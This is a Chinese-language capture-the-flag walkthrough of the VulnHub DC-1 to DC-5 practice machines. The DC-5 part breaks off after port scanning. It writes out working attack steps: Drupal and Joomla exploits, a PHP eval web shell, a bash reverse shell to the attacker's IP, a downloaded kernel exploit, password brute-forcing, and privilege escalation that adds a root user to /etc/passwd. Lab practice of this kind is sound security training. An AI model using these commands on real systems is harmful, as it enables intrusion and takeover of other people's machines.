VulnHub DC

前言

Vulnhub DC 靶场
https://www.vulnhub.com/series/dc,199/

DC1

vulnhub dc1

https://www.vulnhub.com/entry/dc-1,292/

环境

1 2	`kali:192.168.1.17 靶机:192.168.1.10`

信息收集

1	`nmap -p- --min-rate 10000 192.168.1.10 -oA nmap/port`

1	`nmap -sT -sC -sV -O -p22,80,111 192.168.1.10 -oA nmap/detail`

22/tcp：OpenSSH 6.0p1（Debian系统）
80/tcp：Apache 2.2.22 + Drupal 7 CMS
111/tcp：rpcbind 2-4（RPC服务）
操作系统：Linux 3.2-3.16（Debian）
Web应用：Drupal 7（存在robots.txt列出36个限制目录）

Web信息

1	`gobuster dir -u http://192.168.1.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html`

1	`dirsearch -u http://192.168.1.10 -e php,html,txt,js,bak -t 50 -w /usr/share/wordlists/dirb/common.txt`

[07:32:54] 404 -  237B  - /_vti_bin/shtml.dll                                                                                                                                             
[07:32:54] 404 -  245B  - /_vti_bin/_vti_aut/author.dll                                                                                                                                   
[07:32:56] 404 -  244B  - /_vti_bin/_vti_adm/admin.dll                                                                                                                                    
[07:33:23] 403 -    2KB - /Admin                                                                                                                                                          
[07:33:23] 403 -    2KB - /admin                                                                                                                                                          
[07:33:23] 404 -  230B  - /admin.pl                                                                                                                                                       
[07:33:24] 404 -  232B  - /admin.cgi                                                                                                                                                      
[07:33:25] 403 -    2KB - /ADMIN                                                                                                                                                          
[07:33:52] 404 -  234B  - /AT-admin.cgi                                                                                                                                                   
[07:34:06] 403 -    2KB - /batch                                                                                                                                                          
[07:34:22] 404 -  234B  - /cachemgr.cgi                                                                                                                                                   
[07:34:29] 403 -  239B  - /cgi-bin/                                                                                                                                                       
[07:35:50] 403 -  237B  - /Entries                                                                                                                                                        
[07:36:08] 404 -  234B  - /favicon.ico                                                                                                                                                    
[07:36:56] 301 -  247B  - /includes  ->  http://192.168.1.10/includes/                                                                                                                    
[07:37:02] 403 -  243B  - /install.mysql                                                                                                                                                  
[07:37:02] 403 -  243B  - /install.pgsql                                                                                                                                                  
[07:37:33] 200 -    7KB - /LICENSE                                                                                                                                                        
[07:38:05] 301 -  245B  - /misc  ->  http://192.168.1.10/misc/                                                                                                                            
[07:38:09] 301 -  247B  - /modules  ->  http://192.168.1.10/modules/                                                                                                                      
[07:39:08] 404 -  231B  - /player.swf                                                                                                                                                     
[07:39:23] 301 -  248B  - /profiles  ->  http://192.168.1.10/profiles/                                                                                                                    
[07:39:40] 200 -    2KB - /README                                                                                                                                                         
[07:39:58] 200 -  649B  - /robots.txt                                                                                                                                                     
[07:39:58] 200 -  649B  - /robots                                                                                                                                                         
[07:39:59] 403 -  236B  - /Root                                                                                                                                                           
[07:40:08] 301 -  247B  - /scripts  ->  http://192.168.1.10/scripts/                                                                                                                      
[07:40:12] 403 -    2KB - /Search                                                                                                                                                         
[07:40:17] 403 -  238B  - /server-status                                                                                                                                                  
[07:40:20] 403 -    2KB - /search                                                                                                                                                         
[07:40:31] 301 -  245B  - /sites  ->  http://192.168.1.10/sites/                                                                                                                          
[07:41:13] 301 -  246B  - /themes  ->  http://192.168.1.10/themes/                                                                                                                        
[07:41:41] 200 -    2KB - /user                                                                                                                                                           
[07:41:53] 200 -    2KB - /web.config                                                                                                                                                     
[07:42:23] 200 -   60B  - /xmlrpc.php

扫到的路径基本都是Forbidden

80端口是一个登录框

注册账号需要管理员同意

1
2

Thank you for applying for an account. Your account is currently pending approval by the site administrator.
In the meantime, a welcome message with further instructions has been sent to your e-mail address.

http://192.168.1.10/web.config

没有泄露凭据

http://192.168.1.10/robots.txt

和目录扫描的结果一样，都是disallow

根据cmsDrupal 7searchsploit

1	`searchsploit Drupal 7`

先看看txt文件

This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.

You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).

POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]

Retrieve the form_build_id from the response, and then triggering the exploit with :

POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]

This will display the result of the whoami command.

Patch your systems!
Blaklis

csrf，需要cookie，使用不了

MSFGetshell

使用msf

使用第一个

利用不上

使用第二个

1
2
3

use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.1.10
run

拿到交互shell

1 2	`shell python -c "import pty;pty.spawn('/bin/bash')"`

在当前目录找到第一个flag

1	`Every good CMS needs a config file - and so do you.`

数据库修改密码

寻找网站配置文件

1	`/var/www/sites/default/settings.php`

发现flag2和数据库账户

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

flag2

Brute force and dictionary attacks aren't the
only ways to gain access (and you WILL need access).
What can you do with these credentials?

暴力破解和字典攻击不是获取访问权限的唯一方法（而且你会需要访问权限）。
你能用这些凭证做什么？

数据库账户

1	`dbuser:R0ck3t`

连接数据库

mysql -u dbuser -p 
databases;
use drupaldb;
show tables;

+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_update                |
| cache_views                 |
| cache_views_data            |
| comment                     |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_comment_body     |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_comment_body |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_comment_statistics     |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+

查看users表

1	`select * from users;`

uid	用户名	密码哈希（Drupal格式）	邮箱	创建时间戳	最后访问	最后登录	状态	时区
0	(空)	(空)	(空)	0	0	0	0	NULL
1	admin	$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR	admin@example.com	1550581826	1550583852	1550582362	1	Australia/Melbourne
2	Fred	$S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg	fred@example.org	1550581952	1550582225	1550582225	1	Australia/Melbourne
3	xiaowu	$S$D4puaXB52KrP78jEppfpK1EGveijF4Orxz8WFH9dvWeOLtQV7xKz	xiaowu@xiaowu.com	1770380910	0	0	0	Australia/Melbourne
4	manyanj	$S$DzFcHeb2E0eZLs1U8iDPBFocRdstDV/KR3SRvxymw47sKaZfDGiE	1975347148@qq.com	1770381951	0	0	0	Australia/Melbourne

尝试更改admin密码

根据这篇文章

http://drupalchina.cn/node/2128

1	`$S$DZ8aQ1ocXL2XLgKaC3q.zP4xPGU.DIEHr91QiFrze7WLE08IS.4d`

1	`update users set pass="$S$DZ8aQ1ocXL2XLgKaC3q.zP4xPGU.DIEHr91QiFrze7WLE08IS.4d" where name="admin";`

回到80页面尝试登录

1	`admin:123456`

找到flag3

http://192.168.1.10/node/2#overlay-context=node/2

1
2
3

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

特殊的 PERMS 会帮助你 FIND 密码 —— 但你需要 -exec 那个命令，才能知道如何获取 shadow 中的内容。

FIND提权

有提到find以及PERM，可能是suid

回到shell，搜索suid

1	`find / -perm -4000 2>/dev/null`

果然存在find

1	`find . -exec /bin/sh -p \; -quit`

虽然id还是33，但whoami已经是root且能够访问root目录，并读取最后一个flag

Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7


干得漂亮！！！！！

希望你喜欢这个过程并学到了一些新技能。

你可以通过 Twitter（@DCAU7）联系我，告诉我你对这次小小旅程的看法。

根据作者的提示，有5个flag，还差一个

发现存在flag4用户，并在目录找到flag4

Can you use this same method to find or access the flag in root?                                                                                                                          
                                                                                                                                                                                          
Probably. But perhaps it's not that easy.  Or maybe it is? 

你能用同样的方法在 root 目录下找到或访问 flag 吗？

可能可以。但也许没那么容易。又或许其实很简单？

Flag汇总

flag1

1	`Every good CMS needs a config file - and so do you.`

flag2

1
2
3

Brute force and dictionary attacks aren't the
only ways to gain access (and you WILL need access).
What can you do with these credentials?

flag3

1	`Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.`

flag4

1
2
3

Can you use this same method to find or access the flag in root?                                                                                                                          
                                                                                                                                                                                          
Probably. But perhaps it's not that easy.  Or maybe it is?

flag5

Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

DC2

vulnhub dc2

https://www.vulnhub.com/entry/dc-2,311/

环境

1 2	`kali:192.168.1.17 靶机:192.168.1.10`

host文件

1	`192.168.1.10 dc-2`

信息收集

1	`nmap -p- --min-rate 10000 192.168.1.10 -oA nmap/port`

1	`nmap -sT -sC -sV -O -p80,7744 192.168.1.10 -oA nmap/detail`

目标主机信息

操作系统：Linux 3.2 - 4.14（Debian）
MAC 地址：Oracle VirtualBox 虚拟机

开放端口与服务

80/tcp - HTTP
- Apache 2.4.10（Debian）
- WordPress 4.7.10 网站
- 标题：DC-2 – Just another WordPress site
7744/tcp - SSH
- OpenSSH 6.7p1（Debian 8）

Web探测

1	`gobuster dir -u http://192.168.1.10/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50`

并没有找到可利用的路径

80端口WordPress博客页面，根据nmap扫描，为WordPress4.7.10

找到flag1

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.


你常用的密码字典可能没用，所以也许你只需要 cewl。

密码越多越好，但有时你就是无法全部破解。

以一个用户身份登录以查看下一个 flag。

如果找不到，就换另一个用户登录。

cewl（Custom Word List generator）是一个密码字典生成工具。它通过爬取目标网站，提取其中的单词和短语，生成针对性的密码字典

生成字典

密码字典

1	`cewl http://dc-2/ -w pass.txt`

用户字典

WPScan 是专门针对 WordPress 的安全扫描器，用于检测 WordPress 网站的安全漏洞。

1	`wpscan --url dc-2 -e u`

三个用户

1
2
3

admin
jerry
tom

破解用户

1	`wpscan --url http://dc-2 -U user.txt -P pass.txt`

jerry，tom破解成功

1 2	`\| Username: jerry, Password: adipiscing \| Username: tom, Password: parturient`

##登录后台

在jerry用户后台找到flag2

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

如果无法利用 WordPress 的漏洞走捷径，那还有另一种方法。

希望你找到了另一个入口点。

没有在后台找到修改模板执行命令的地方，尝试ssh

ssh登录

1	`hydra -L user.txt -P pass.txt 192.168.1.10 ssh -s 7744`

1	`tom:parturient`

可以登录

在当前目录找到flag3，但很多命令使用不了，应该是受限shell

绕过rbash

https://blog.csdn.net/2301_79518550/article/details/147287764

查看可用命令

1	`compgen -c`

vi可用

运行：vi或vim
按:，输入:set shell=/bin/bash，然后执行:shell
或者直接输入:!/bin/bash
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

成功

flag3

1
2
3

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

可怜的tom总是在追Jerry。也许他应该 su（切换用户）来缓解压力。

根据提示，su jerry，成功登录，并在jerry目录找到

flag4

Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!


很高兴看到你走到了这一步——但你还没有成功。

你仍然需要拿到最终的 flag（唯一真正重要的 flag！！！）。

这里没有提示了——现在全靠你自己了。 :-)

继续吧——赶紧出去！！！

没有提示了，寻找提权方式

sudo git 提权

sudo -l 发现可以使用git

# 1. 创建指向 /bin/sh 的符号链接
ln -s /bin/sh git-x

# 2. 设置 Git 执行路径为当前目录
sudo git --exec-path=. x

成功

在root目录找到第五个flag

 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Flag汇总

flag1

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

flag2

1
2
3

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

flag3

1	`Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.`

flag4

Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

flag5

 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

DC3.2

vulnhub DC 3.2

https://www.vulnhub.com/entry/dc-32,312/

靶机IP

1	`192.168.1.16`

信息收集

1	`nmap -sn 192.168.1.0/24`

1	`nmap -p- --min-rate 10000 192.168.1.16 -oN nmap/port.txt`

1	`nmap -sT -sC -sV -O -p80 192.168.1.16 -oN nmap/detail.txt`

1	`nmap --script=vuln -p80 192.168.1.16 -oN nmap/vuln.txt`

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:18:12:38 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14
Network Distance: 1 hop

仅80端口开放

框架：Joomla cms

操作系统：Linux 3.2 - 4.14

1
2

gobuster dir -u http://192.168.1.16/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50
dirsearch -u http://192.168.1.16 -e php,html,txt,js,bak -t 50 -w /usr/share/wordlists/dirb/common.txt

200 - /README.txt
200 - /LICENSE.txt
200 - /htaccess.txt
200 - /configuration.php
301 - /administrator -> http://192.168.1.16/administrator/
301 - /bin -> http://192.168.1.16/bin/
301 - /cache -> http://192.168.1.16/cache/
301 - /components -> http://192.168.1.16/components/
301 - /images -> http://192.168.1.16/images/
301 - /includes -> http://192.168.1.16/includes/
200 - /index.php
301 - /language -> http://192.168.1.16/language/
301 - /layouts -> http://192.168.1.16/layouts/
301 - /libraries -> http://192.168.1.16/libraries/
301 - /media -> http://192.168.1.16/media/
301 - /modules -> http://192.168.1.16/modules/
301 - /plugins -> http://192.168.1.16/plugins/
403 - /server-status
301 - /templates -> http://192.168.1.16/templates/
301 - /tmp -> http://192.168.1.16/tmp/

通过readme.txt 收集到cms版本Joomla! 3.7

SQL注入

expolit存在sql注入

1	`searchsploit Joomla! 3.7`

sqlmap -u "http://192.168.1.16/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" \
  -p "list[fullordering]" \
  --risk=3 --level=5 \
  --random-agent \
  --dbs

Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(6745,CONCAT(0x2e,0x717a787071,(SELECT (ELT(6745=6745,1))),0x716b706271),6543))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 8817 FROM (SELECT(SLEEP(5)))QwmI)
---
[07:21:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[07:21:57] [INFO] fetching database names
[07:21:57] [INFO] retrieved: 'information_schema'
[07:21:57] [INFO] retrieved: 'joomladb'
[07:21:57] [INFO] retrieved: 'mysql'
[07:21:57] [INFO] retrieved: 'performance_schema'
[07:21:57] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

sqlmap -u "http://192.168.1.16/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" \   
  -p "list[fullordering]" \                                                
  --risk=3 --level=5 \                                                   
  --random-agent \                                                      
  -D joomladb \                                                    
  --tables

+---------------------+
| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks    |
| #__banners          |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments    |
| #__bsms_locations   |
| #__bsms_mediafiles  |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series      |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers    |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics      |
| #__bsms_update      |
| #__categories       |
| #__contact_details  |
| #__content_frontpag |
| #__content_rating   |
| #__content_types    |
| #__content          |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups    |
| #__fields_values    |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy  |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens    |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages        |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules          |
| #__newsfeeds        |
| #__overrider        |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas          |
| #__session          |
| #__tags             |
| #__template_styles  |
| #__ucm_base         |
| #__ucm_content      |
| #__ucm_history      |
| #__update_sites_ext |
| #__update_sites     |
| #__updates          |
| #__user_keys        |
| #__user_notes       |
| #__user_profiles    |
| #__user_usergroup_m |
| #__usergroups       |
| #__users            |
| #__utf8_conversion  |
| #__viewlevels       |
+---------------------+

#__users表里得到数据

+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+

john破解

1
2
3

john --format=bcrypt hash.hash --wordlist=/usr/share/wordlists/rockyou.txt

admin:snoopy

靶机没开22端口，80端口是登录框

没有得到有用信息，目录扫描得到/administrator路径，也是登录框

成功

模板GetShell

在Templates模板修改，可以代码执行

写入一句话

1	`eval($_POST['cmd']);`

蚁剑连接，反弹shell

发行版本提权

uname -a
 
cat /etc/issue
 
cat /proc/version

lsb_release -a

www-data@DC-3:/var/www/html$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
www-data@DC-3:/var/www/html$ searchsploit linux kernel 4.4.0
searchsploit linux kernel 4.4.0
searchsploit: command not found
www-data@DC-3:/var/www/html$ cat /etc/issue
cat /etc/issue
Ubuntu 16.04 LTS \n \l

www-data@DC-3:/var/www/html$ cat /proc/version
cat /proc/version
Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016
www-data@DC-3:/var/www/html$ lsb_release
lsb_release
No LSB modules are available.
www-data@DC-3:/var/www/html$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04 LTS
Release:        16.04
Codename:       xenial
www-data@DC-3:/var/www/html$

试了42276，44298，43418均失败，网上找wp，使用39772

根据文档里的步骤

kali:
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip -O ./39772.zip
python -m http.server 80

靶机
wget http://192.168.1.17/39772.zip
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput

拿到root，并找到flag

 __        __   _ _   ____                   _ _ _ _ 
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
                                                     

Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!

DC4

vulnhub dc 4

https://www.vulnhub.com/entry/dc-4,313/

靶机IP

1	`192.168.1.11`

信息收集

1	`nmap -p- --min-rate 10000 192.168.1.11 -oN nmap/port.txt`

1	`nmap -sT -sC -sV -O -p22,80 192.168.1.11 -oN nmap/detail.txt`

操作系统：Linux 3.2 - 4.14（Debian）
端口：22(OpenSSH 7.4p1)，80(nginx 1.15.10)

1	`gobuster dir -u http://192.168.1.11/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.js,.html -t 50`

1 2	`[08:11:16] 301 - 170B - /css -> http://192.168.1.11/css/ [08:11:23] 301 - 170B - /images -> http://192.168.1.11/images/`

没有有用信息

暴力破解

80端口为登录框，源码无信息，尝试sql注入，失败

似乎只剩暴力这条路

burp抓包发现是明文，但并没有账号或密码错误的回显

尝试爆破
成功

得到凭据

1	`admin:happy`

后台RCE

命令执行面板

抓包得到参数为执行的命令

1	`radio=ls+-l&submit=Run`

反弹shell

1
2
3

curl -X POST http://192.168.1.11/command.php \
  -H "Cookie: PHPSESSID=u8qlergatfe52bkor6q6iatcv1" \
  -d "radio=bash -c 'bash -i >%26 /dev/tcp/192.168.1.17/6666 0>%261'&submit=Run"

邮箱获取凭据

1	`find / -perm -4000 2>/dev/null`

suid发现/home/jim/test.sh可疑文件并且权限为777

1	`-rwsrwxrwx 1 jim jim 174 Apr 6 2019 /home/jim/test.sh`

# 1. 覆盖 test.sh
echo '#!/bin/bash' > /home/jim/test.sh
echo '/bin/bash' >> /home/jim/test.sh

# 2. 执行
/home/jim/test.sh

失败，还是www权限，但在jim家目录发现old-passwords.bak备份密码本

保存下来爆破ssh

1	`hydra -l jim -P pass.txt ssh://192.168.1.11`

得到凭据

1	`jim:jibril04`

jim家目录下的mbox有查看权限

From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
        (envelope-from <root@dc-4>)
        id 1hCiQe-0000gc-EC
        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

一封邮件，得到信息：

邮件服务器：Exim 4.89
发件人：root@dc-4
收件人：jim@dc-4
时间：2019年4月6日
内容：仅测试消息

寻找邮件保存位置

在/var/spool/mail 找到jim邮件

From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

得到凭据

1	`charles:^xHhA&hvim0y`

teehee提权

登录charles用户

发现 /usr/bin/teehe 有sudo权限

gtfbins未搜到，查看该程序帮助

charles@dc-4:~$ /usr/bin/teehee  --help
Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

可以追加文件，尝试追加/etc/passwd

创建hack用户

1 2	`openssl passwd -1 -salt hack password echo 'hack:$1$hack$Qfvz92fBAtSC9ccCE6BES0:0:0:root:/root:/bin/bash' \| sudo /usr/bin/teehee -a /etc/passwd`

成功，并得到flag

888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

DC5

Vulnhub DC5

https://www.vulnhub.com/entry/dc-5,314/

靶机IP

1	`192.168.1.5`

信息收集

1	`nmap -p- --min-rate 10000 192.168.1.7 -oN nmap/port.txt`

PORT      STATE SERVICE                                                   
80/tcp    open  http                                                     
111/tcp   open  rpcbind                                                   
45665/tcp open  unknown

1	`nmap -sT -sC -sV -O -p80,111,45665 192.168.1.7 -oN nmap/detail.txt`

STATE SERVICE VERSION

80/tcp    open  http    nginx 1.6.2
|_http-title: Welcome
|_http-server-header: nginx/1.6.2
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          44972/udp   status
|   100024  1          45665/tcp   status
|   100024  1          45705/udp6  status
|_  100024  1          50069/tcp6  status
45665/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:99:6F:74 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16
Network Distance: 1 hop

操作系统：Linux 3.2 - 4.14
开放端口：80，111，45665
nginx 1.6.2

1
2

